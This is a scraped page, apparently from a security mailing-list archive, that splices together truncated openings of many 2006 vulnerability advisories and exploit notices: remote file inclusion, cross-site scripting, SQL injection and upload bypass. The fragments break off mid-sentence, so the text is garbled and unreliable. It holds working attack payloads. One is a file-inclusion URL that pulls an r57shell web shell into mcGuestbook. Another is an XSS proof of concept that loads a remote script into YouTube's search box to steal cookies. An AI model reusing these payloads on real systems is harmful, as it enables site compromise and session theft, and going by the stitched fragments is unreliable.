=
Discovered By: CrAzY CrAcKeR
Site:www.alshmokh.com
I want to thank my friend:-
nono225-mHOn-rageh-Lover Hacker-Brh
BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
=
Example:-
===
Ubuntu Security Notice USN-303-1 June 16, 2006
mysql-dfsg-4.1, mysql-dfsg-5.0 vulnerability
CVE-2006-2753
===
A security issue affects the following Ubuntu releases:
Boardhost.com
Description:
Free Msgboard hosting service.
Homepage:
http://www.Boardhost.com
Affected files
Input boxes of posting a message
Searching for a listing board
-
XSS vuln with cookie disclosure when posting a msg (Tested on
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00657001
Version: 1
HPSBUX02115 SSRT061077 rev.1 - HP-UX running Support Tools Manager (xstm, cstm,
stm)
Local Denial of Service (DoS)
NOTICE: The information in this Security Bulletin
##
# Develooping Flash Chat (banned_file) Remote File Inclusion
##
# Credit : SpC-x
# Site : http://wWw.SaVSaK.CoM
##
# Greetz :
# |
Discovered By CrAsh_oVeR_rIdE
indexu remote file include
--
site of script:http://www.nicecoder.com/
-
Vulnerable: INDEXU v5.0.1
file include
include($admin_template_path.msg.php);
admin_template_path
A Bug in the eBD HTML editor has been discovered. It will allow an user to
modify the images of the /imgfiles folder (the files raised in the option
resources images).
Oasyssoft, the producer, has installed the patch in all our servers, so all
MyeBD users are updated since the end of may.
vendor:http://www.axent.us/axentforum.cfm
affected versions:aXentForum II and prior
aXentForum II contains a flaw that allows a remote Cross-Site Scripting
attacks.Input passed to the startrow parameter in viewposts.cfm isn't
properly sanitised before being returned to the user.
This can be
Multiple file include exploits in nucleus 3.23
script type : nucleus 3.23
bug found by : sweet-devil
team : site-down
type : file include
exploits :
action.php
Chatizens.com Also known as Chattown.com
Homepage:
http://www.chatizens.com
Affected files:
* Profile input boxes:
All input boxes of your profile.
* Browsing the forums
XSS vuln with cookie disclosure via profile input boxes.
To bypass
-
Advisory id: FSA:018
Author:Federico Fazzi
Date: 15/06/2006, 23:36
Sinthesis: Calendarix 0.7.20060401, SQL Injection Vulnerabilities
Type: low
Product: http://www.calendarix.com/
Patch: unavailable
##
# Ji-takz Chat (mycfg) Remote File Inclusion
##
# Credit : SpC-x
# Site : http://wWw.SaVSaK.CoM
##
# Greetz :
# | Liz0ziM | Ejder |
Zeroboard File Upload extension bypass Vulnerability
Author : Choi Min-sung (mins __at__ wins21.com)
Product : Zeroboard http://www.nzeo.com
Verndor-Patches : Unpatched
Impact : remote code execution
Summary
===
Basically, the PHP, HTML, and CGI files are prohibited to upload in
FUJITSU SERVICES SECURITY ADVISORY
DATE: 27-01-2006
AUTHOR: THOMAS LIAM ROMANIS
VENDOR: Cisco
PRODUCT: Cisco Secure ACS
VERSION(S) TESTED: Cisco Secure ACS version 2.3 UNIX hosted on Netscape
FastTrack Server version 2.01c on Sun Solaris 8.0
TITLE: Cisco Secure ACS LogonProxy.cgi Cross Site
Blacksingles.com
Homepage:
http://www.blacksingles.com
Affected files
Profile input boxes
Add a friend input box.
list.html
view.html
reply.html
compose.html
-
XSS vuln with cookie disclosure via the Location box.
User data isn't
Multiple file include exploits in mcGuestbook 1.3
script type : mcGuestbook 1.3
bug found by : sweet-devil
team : site-down
type : file include
exploits :
admin.php
http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?
From my own mail archives, PHP appears to make up at least 4%
of the email to bugtraq I see - or over 1000 issues since 1995,
out of the 25,000 I have saved.
People complain about applications like sendmail...in the same
period, it has been resopnsible for less than 200.
Do we have a new
**
PictureDis Products lang Parameter File Inclusion Vulnerability
=
Input passed to the lang parameter in thumstbl.php, wpfiles.php,
and
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:106
http://www.mandriva.com/security/
The Exploit with Bugtraq ID: 17909 has been researched by the developers of the
ISPConfig webhosting controlpanel. The result is that no ISPConfig 2.2.2
installation is vulnerable to this reported exploit.
Explanation:
1) The exploit expects a file (session.inc.php) to be in the webroot, but
Youtube.com
Homepage:
http://www.youtube.com
Affected files:
* Search box input
* Adding a new blog:
- Blog name
XSS Vuln with cookie disclosure via search box:
Data isn't sanatized when using the search box. For PoC input:
script src=http://www.youfucktard.com/xss.js/script
PoC
Bingbox.com
Homepage:
http://www.bingbox.com
Affected files:
* Profile input boxes:
- City input
* Registering
* Viewing Birthdays
* Adding a friend
* Viewing people online
---
XSS with cookie disclosure via inviting friends:
22 matches
Mail list logo